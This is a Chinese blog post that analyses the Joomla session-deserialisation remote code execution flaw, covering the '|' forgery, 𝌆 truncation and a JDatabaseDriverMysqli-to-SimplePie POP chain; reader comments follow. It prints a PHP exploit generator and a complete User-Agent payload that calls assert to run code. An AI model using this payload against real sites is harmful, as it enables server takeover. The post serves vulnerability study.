Joomla远程代码执行漏洞分析(总结)

joomla漏洞出来这么久了,我也于当天在drops发表了这篇文章( http://drops.wooyun.org/papers/11330 )。今天再看,还是有点急促,有些原理上的东西没说清楚。

我在自己博客里,把这篇文章增加一些原理上的说明,发出来留个底稿。

漏洞点 —— 反序列化session

这个漏洞存在于反序列化session的过程中。

漏洞存在于 libraries/joomla/session/session.php 中,_validate函数,将ua和xff调用set方法设置到了session中(session.client.browser和session.client.forwarded)

<?php
protected function _validate($restart = false)
    {
        ...

        // Record proxy forwarded for in the session in case we need it later
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
        }

        ...
        // Check for clients browser
        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
        {
            $browser = $this->get('session.client.browser');

            if ($browser === null)
            {
                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
            }
            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)
            {
                // @todo remove code: $this->_state = 'error';
                // @todo remove code: return false;
            }
        } 

最终跟随他们俩进入数据库,session表:

14501741134471.jpg

正常情况下,不存在任何问题。因为我们控制的只是反序列化对象中的一个字符串,不会触发反序列相关的漏洞。

但是,因为一个小姿势,导致后面我们可以控制整个反序列化对象。

利用|字符伪造,控制整个反序列化字符串

首先,我们需要先看看@Ryat老师的pch-013: https://github.com/80vul/phpcodz/blob/master/research/pch-013.md

和pch-013中的情况类似,joomla也没有采用php自带的session处理机制,而是用多种方式(包括database、memcache等)自己编写了存储session的容器(storage)。

其存储格式为『键名 + 竖线 + 经过 serialize() 函数反序列处理的值』,其未正确处理多个竖线的情况。

那么,我们这里就可以通过注入一个|符号,将它前面的部分全部认为是name,而|后面我就可以插入任意serialize字符串,构造反序列化漏洞了。

14501748976406.jpg

但还有一个问题,在我们构造好的反序列化字符串后面,还有它原本的内容,必须要截断。而此处并不像SQL注入,还有注释符可用。

但不知各位是否还记得当年wordpress出过的一个XSS( http://www.leavesongs.com/HTML/wordpress-4-1-stored-xss.html ),当时就是在插入数据库的时候利用"𝌆"(%F0%9D%8C%86)字符将utf-8的字段截断了。

这里我们用同样的方法,在session进入数据库的时候就截断后面的内容,避免对我们反序列化过程造成影响。

原理探究:何谓处理多个|不合理

实际上是php底层对session字符串处理的不合理。

其实L.N的文章里已经可以看到原理了 http://bobao.360.cn/learning/detail/2501.html

在php5.6.13以前的版本里,php在获取session字符串以后,就开始查找第一个|,然后用这个|将字符串分割成『键名』和『键值』。
用unserialize解析键值,解析结果作为session。

但如果这个unserialize解析失败,就放弃这次解析。找到下一个|,再根据这个|将字符串分割成两部分,执行同样的操作,直到解析成功。

所以,这个joomla漏洞的核心内容就是:我们通过𝌆字符, 将原本的session截断了,结果因为长度不对所以第一次解析|失败,才轮到第二次解析我传入的|,最后成功利用。

所以,构造session出错,是这个漏洞成立的核心。

所以,我们还能不能想到其他利用方法?

比如,我们可以用长字符(64k)串截断,来达成类似和𝌆字符截断一样的效果。

这几天,joomla再次对此漏洞进行了加固: http://bobao.360.cn/learning/detail/2527.html ,处理的很优秀,欣赏这样的态度。

构造POP执行链,执行任意代码

在可以控制反序列化对象以后,我们只需构造一个能够一步步调用的执行链,即可进行一些危险的操作了。

exp构造的执行链,分别利用了如下类:

  1. JDatabaseDriverMysqli
  2. SimplePie

我们可以在JDatabaseDriverMysqli类的析构函数里找到一处敏感操作:

<?php
public function __destruct()
    {
        $this->disconnect();
    }
    ...
    public function disconnect()
    {
        // Close the connection.
        if ($this->connection)
        {
            foreach ($this->disconnectHandlers as $h)
            {
                call_user_func_array($h, array( &$this));
            }

            mysqli_close($this->connection);
        }

        $this->connection = null;
    } 

当exp对象反序列化后,将会成为一个JDatabaseDriverMysqli类对象,不管中间如何执行,最后都将会调用__destruct__destruct将会调用disconnectdisconnect里有一处敏感函数:call_user_func_array

但很明显,这里的call_user_func_array的第二个参数,是我们无法控制的。所以不能直接构造assert+eval来执行任意代码。

于是这里再次调用了一个对象:SimplePie类对象,和它的init方法组成一个回调函数[new SimplePie(), 'init'],传入call_user_func_array

跟进init方法:

<?php
function init()
    {
        // Check absolute bare minimum requirements.
        if ((function_exists('version_compare') && version_compare(PHP_VERSION, '4.3.0', '<')) || !extension_loaded('xml') || !extension_loaded('pcre'))
        {
            return false;
        }
        ...
        if ($this->feed_url !== null || $this->raw_data !== null)
        {
            $this->data = array();
            $this->multifeed_objects = array();
            $cache = false;

            if ($this->feed_url !== null)
            {
                $parsed_feed_url = SimplePie_Misc::parse_url($this->feed_url);
                // Decide whether to enable caching
                if ($this->cache && $parsed_feed_url['scheme'] !== '')
                {
                    $cache = call_user_func(array($this->cache_class, 'create'), $this->cache_location, call_user_func($this->cache_name_function, $this->feed_url), 'spc');
                } 

很明显,其中这两个call_user_func将是触发代码执行的元凶。

所以,我将其中第二个call_user_func的第一个参数cache_name_function,赋值为assert,第二个参数赋值为我需要执行的代码,就构造好了一个『回调后门』。

所以,exp是怎么生成的,给出我写的生成代码:

<?php
//header("Content-Type: text/plain");
class JSimplepieFactory {
}
class JDatabaseDriverMysql {

}
class SimplePie {
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
        $this->javascript = 9999;
        $this->cache_name_function = "assert";
        $this->sanitize = new JDatabaseDriverMysql();
        $this->cache = true;
    }
}

class JDatabaseDriverMysqli {
    protected $a;
    protected $disconnectHandlers;
    protected $connection;
    function __construct()
    {
        $this->a = new JSimplepieFactory();
        $x = new SimplePie();
        $this->connection = 1;
        $this->disconnectHandlers = [
            [$x, "init"],
        ];
    }
}

$a = new JDatabaseDriverMysqli();
echo serialize($a); 

14501734764205.jpg

将这个代码生成的exp,以前面提到的注入『|』的变换方式,带入前面提到的user-agent中,即可触发代码执行。

其中,我们需要将char(0)*char(0)替换成\0\0\0,因为在序列化的时候,protected类型变量会被转换成\0*\0name的样式,这个替换在源代码中也可以看到:

<?php
$result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result); 

构造的时候遇到一点小麻烦,那就是默认情况下SimplePie是没有定义的,这也是为什么我在调用SimplePie之前先new了一个JSimplepieFactory的原因,因为JSimplepieFactory对象在加载时会调用import函数将SimplePie导入到当前工作环境:

14501735764788.jpg

而JSimplepieFactory有autoload,所以不再需要其他include来对其进行加载。

给出我最终构造的POC(既是上述php代码生成的POC):

User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆

14501837463659.jpg

赞赏

喜欢这篇文章,扫码和我成为赞友!

评论

jianson 回复

请问一下,如果使用了第三方插件的话,使用了thinkphp的框架,在输出get_class的时候没有加载到那个类,怎么进行把那个文件包含进来呢?

phithon 回复

@jianson 可以参考这个 https://bugs.leavesongs.com/PHP/Phpwind-GET%E5%9E%8BCSRF%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ ThinkPHP5有autoload

xxx 回复

你好,请教一下
1、这个poc是不是只能在3.x下的版本执行?
2、问题1如果是的话,在2.x 版本poc如何构造,我看了下在2.x版本下没有jdatabasedrivermysqli类,在2.x版本与jdatabasedrivermysqli类对应类为jdatabasemysqli类和jdatabasemyssql类的利用magic function不能用于构造pop链,怎么样才能找到可以构造POP链的类?
问题1的答案如果是否的话,也能在2.x版本或者1.x版本下执行的话,有可能的原因是什么??
谢谢

phithon 回复

@xxx:这个我也没研究过,希望你能去研究一下,共同学习~

独自等待 回复

大牛,分析的不错。。。学习了。

L 回复

$this->connection = true;去验证的话
这样的话序列化之后应该是connection";b:1;}吧

phithon 回复

@L:是吧。
$this->connection = true;

$this->connection = 1;
效果都一样,我的POC里用的后者。

佛山不锈钢管 回复

来访啦!

mr 回复

@佛山不锈钢管:搞不锈钢的都跟搞安全有一腿了, 有点看不懂啊......

佛山不锈钢管 回复

@mr:哈哈哈哈。。。。。。

captcha